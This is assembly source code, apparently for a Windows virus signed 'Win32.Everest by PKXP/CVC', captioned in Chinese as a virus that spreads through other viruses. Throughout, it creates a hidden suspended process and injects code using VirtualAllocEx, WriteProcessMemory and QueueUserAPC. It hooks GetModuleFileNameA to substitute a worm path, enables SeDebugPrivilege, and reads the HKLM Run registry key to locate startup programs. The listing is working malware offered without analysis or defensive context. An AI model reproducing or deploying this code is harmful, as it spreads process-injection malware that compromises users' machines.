virus.c

一个病毒原代码,能够利用其他病毒传播

StartVirus      PROC      szVirusPath : DWORD        
       LOCAL   sio       : STARTUPINFO
LOCAL   pi        : PROCESS_INformATION
LOCAL   cbWritten : DWORD

       pushad                 
  push    sizeof(STARTUPINFO)
       lea     eax , sio
       push    eax
       call    RtlZeroMemory
  mov     sio.cb , sizeof STARTUPINFO
  mov     sio.wShowWindow , SW_HIDE
       mov     sio.dwFlags , STARTF_USESHOWWINDOW
                     
       lea     eax , pi
       push    eax
       lea     eax , sio
       push    eax
       push    NULL       
       push    NULL 
       push    CREATE_SUSPENDED
       push    TRUE
       push    NULL 
       push    NULL 
       push    szVirusPath
       push    NULL
       call    CreateProcess
       or      eax , eax
 jzSVExit

       push    3000
       call    Sleep
       
       pushPAGE_EXECUTE_READWRITE 
pushMEM_RESERVE or MEM_COMMIT
pushRemoteCodeEnd - RemoteCodeStart
push0
push    pi.hProcess
call    VirtualAllocEx 
or      eax , eax
jzSVFail
mov     esi , eax

add     eax , NewGetModuleFileName - RemoteCodeStart
mov     _NewGetModuleFileNameA , eax
      
       lea     eax , cbWritten
       push    eax
       push    RemoteCodeEnd - RemoteCodeStart
       push    offset  RemoteCodeStart
       push    esi       
       push    pi.hProcess
       call    WriteProcessMemory 
       or      eax , eax
jzSVFail

       push    NULL
       push    pi.hThread
       push    esi        
       call    QueueUserAPC
       or      eax , eax
jzSVFail
         
       push    pi.hThread
       call    ResumeThread        
SVFail:
       push    pi.hThread
       call    CloseHandle
       push    pi.hProcess
       call    CloseHandle
SVExit:           
       popad
       ret     4
StartVirus      ENDP

;-----------------------------------------------------------------
RemoteCodeStart:       
       mov      esi , 12345678h
_GetModuleFileNameA   = dword ptr $-4                     
       
       @pushsz  '123'          ;cbWriten         
       push     PAGE_EXECUTE_READWRITE  
       push     6                       ; push & ret
       push     esi
       mov      eax , 12345678h
_VirtualProtect  = dword ptr $-4
       call     eax
     
       @pushsz  '123'         ;cbWriten         
       push     6
       call     RCSJump
       push     12345678h                
_NewGetModuleFileNameA = dword ptr $-4                
       ret
RCSJump:
       push     esi
       push     -1
       mov      eax , 12345678h
_WriteProcessMemory = dword ptr $-4
       call     eax 
       ret      4        

NewGetModuleFileName:
       push     esi
       push     edi
       mov      edi , [esp+16]
       call     _szWormPath
szWormPath       db    MAX_PATH dup (0)
_szWormPath:        
       pop      esi        
       xor      ecx , ecx
RCSLoop:
       lodsb
       stosb
       inc      ecx        
       or       al , al
       jnz      RCSLoop       
       pop      edi
       pop      esi
       mov      eax , ecx
       dec      eax
       ret      12        
RemoteCodeEnd:       

;-----------------------------------------------------------------
GetAPIz:
       @pushsz   'Kernel32.dll'
       call      GetModuleHandle
       xchg      eax,esi             
       
       @pushsz   'GetModuleFileNameA'
       push      esi
       call      GetProcAddress
       mov       _GetModuleFileNameA,eax  
       
       @pushsz   'VirtualProtect'
       push      esi
       call      GetProcAddress
       mov       _VirtualProtect,eax  
       
       @pushsz   'WriteProcessMemory'
       push      esi
       call      GetProcAddress
       mov       _WriteProcessMemory,eax

       @pushsz    'PSAPI'
       call       LoadLibraryA
       xchg       eax,esi

       @pushsz    'EnumProcesses'
       push       esi
       call       GetProcAddress
       mov        _EnumProcesses,eax             
                
       @pushsz    'EnumProcessModules'
       push       esi
       call       GetProcAddress
       mov        _EnumProcessModules,eax                   

       @pushsz    'GetModuleFileNameExA'
       push       esi
       call       GetProcAddress
       mov        _GetModuleFileNameEx,eax                   
       ret        
       
;---------------Raise Privilege of our process----------------------
RaisePrivileges:
       call      GetCurrentProcess
       push      offset p_token
       push      TOKEN_ALL_ACCESS       ;DesiredAccess
       push      eax                        
       call      OpenProcessToken       ;open token of our process    
       or        eax,eax                ;God,I used cmp eax,eax first
       jz        RPExit

       push      offset p_luid    
       @pushsz   'SeDebugPrivilege'
       push      NULL
       call      LookupPrivilegevalueA  ;find LUID for this priv.
       dec       eax
       jne      RPExit
   
       push      0
       call      SetLastError
       push      NULL
       push      NULL
       push      NULL
       push      offset token_priv
       push      FALSE
       push      p_token
       call      AdjustTokenPrivileges
RPExit:    
       ret
       token_priv   dd    1
       p_luid       db    8 dup(0)
                    dd    SE_PRIVILEGE_ENABLED
       p_token      dd    0

;-------------------------------------------------------------------   
ReadRunKey    PROC
       LOCAL    hKey                   : DWORD
       LOCAL    dwIndex                : DWORD        
       LOCAL    szFilePath[MAX_PATH]   : BYTE
       LOCAL    szvalueName[MAX_PATH]  : BYTE
       LOCAL    dwvalueLen             : DWORD
       LOCAL    dwDataLen              : DWORD
       LOCAL    dwType                 : DWORD
       
       pushad                       
       lea      eax , hKey
push     eax
push     KEY_QUERY_value            ;KEY_ALL_ACCESS
push     0
       @pushsz  'Software\Microsoft\Windows\CurrentVersion\Run'       
push     HKEY_LOCAL_MACHINE
call     RegOpenKeyEx
cmp      eax , ERROR_SUCCESS
jnz      RRKExit         

push     0
pop      dwIndex
push     pMem
pop      edi

RRKLoop:              
push     MAX_PATH
 pop      dwDataLen
push     MAX_PATH
pop      dwvalueLen
       lea      eax , dwDataLen
       push     eax        
       lea      esi , szFilePath
       push     esi
       lea      eax , dwType
       push     eax
       push     NULL
       lea      eax , dwvalueLen
       push     eax        
       lea      eax , szvalueName
       push     eax        
       push     dwIndex
       push     hKey
       call     RegEnumvalue
       cmp      eax , ERROR_SUCCESS
       jnz      RRKClose
            
       push     edi        
       mov      edi , esi
       push     edi
       call     lstrlen
       mov      ecx , eax
       mov      al , '\'
       repnz    scasb
       pop      edi
       jz       RRRKReplace
                              
       push     esi
       @pushsz  '\'      
       push     offset szWinPath
       @pushsz  '%s%s%s'
       push     edi
       call     wsprintf       
       add      esp , 20       
               
       push     edi
       call     lstrlen        
       add      edi , eax      
       xor      al , al
       stosb
               
       push     esi
       @pushsz  '\'      
       push     offset szSysPath
       @pushsz  '%s%s%s'
       push     edi
       call     wsprintf       
       add      esp , 20       
       jmp      RRKNext                
       
RRRKReplace:        
       push     esi         
       call     ReplaceFilePath

       push     esi       
       push     edi
       call     lstrcpy
RRKNext:                         
       push     edi
       call     lstrlen        
       add      edi , eax   
       xor      al , al
       stosb
       inc      dwIndex
       jmp      RRKLoop                
RRKClose:        

       push     hKey
       call     RegCloseKey 
RRKExit:                    
       xor      al , al
       stosb                
       popad               
       ret
ReadRunKey   ENDP

;------------------------------------------------------------------
ReplaceFilePath     PROC   szFilePath  : DWORD
       LOCAL       s[MAX_PATH] : BYTE        
       pushad      
       push     szFilePath
       lea      edi , s
       push     edi
       call     lstrcpy 
IsSysDir:                        
       push     8
       pop      ecx
       @pushsz  '%system%'   ;len=8
       pop      esi
       repz     cmpsb
       jne      IsWinDir
               
       push     offset szSysPath
       push     szFilePath
       call     lstrcpy   
       jmp      RFPCat
IsWinDir:        
       push     8
       pop      ecx
       @pushsz  '%windir%'   ;len=8
       pop      esi
       lea      edi , s    
       repz     cmpsb
       jne      RFPExit
               
       push     offset szWinPath
       push     szFilePath
       call     lstrcpy           
RFPCat:        
       push     edi
       push     szFilePath
       call     lstrcat        
RFPExit:     
       popad
       ret      4
ReplaceFilePath         ENDP           

Signature     db   'Win32.Everest by PKXP/CVC, made in China.',0
szWinPath     db    50  dup (0)
szSysPath     db    50  dup (0)
tmp           dd    ?  
pMem          dd    0

VEnd: 
end main